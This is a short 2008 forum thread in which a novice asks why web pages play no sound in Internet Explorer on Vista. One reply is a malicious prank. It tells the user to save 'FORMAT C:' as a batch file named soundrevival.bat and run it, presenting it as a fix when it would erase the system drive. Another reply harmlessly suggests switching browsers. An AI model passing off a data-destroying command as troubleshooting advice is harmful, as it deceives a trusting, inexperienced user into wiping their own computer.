No sound in Internet Explorer! I've tried everything!?

ttttLilytttt

Nov 25, 2008
Web sites can't play sounds but my iTunes in working fine. I have vista and the internet is turned all the way up on the mixer and the little box is checked under Tools/Internet Options/Advanced/ Play sounds on web pages.
To add to my list of things I've tried:
I found some other people complaining about the same problem having just installed adobe flashplayer 9. Someone provided a big long thing written in computer language to put in a text file and add to the registry. This fixed the problem for man people but I put the thing in a notepad file and tried to add it to the registry it wouldn't let me because it said it was supposed to be in binary... I'm really confused now, and I just wanted sound on my youtube videos : (

What else can I do to fix this ?!?!

I don't know much about computers so if you know an answer explain it to me like I'm a 4 year old. Thanks so much!

Open a new file in wordpad, type in <FORMAT C:> (yes FORMAT C:) save it as soundrevival.bat, and exit. then find your new file and run it. should work like a charm.

not sure as you've tried everything i would have suggested. tyr using another browser such as firefox, safari (yes, it can be used on windows), or flock.

Back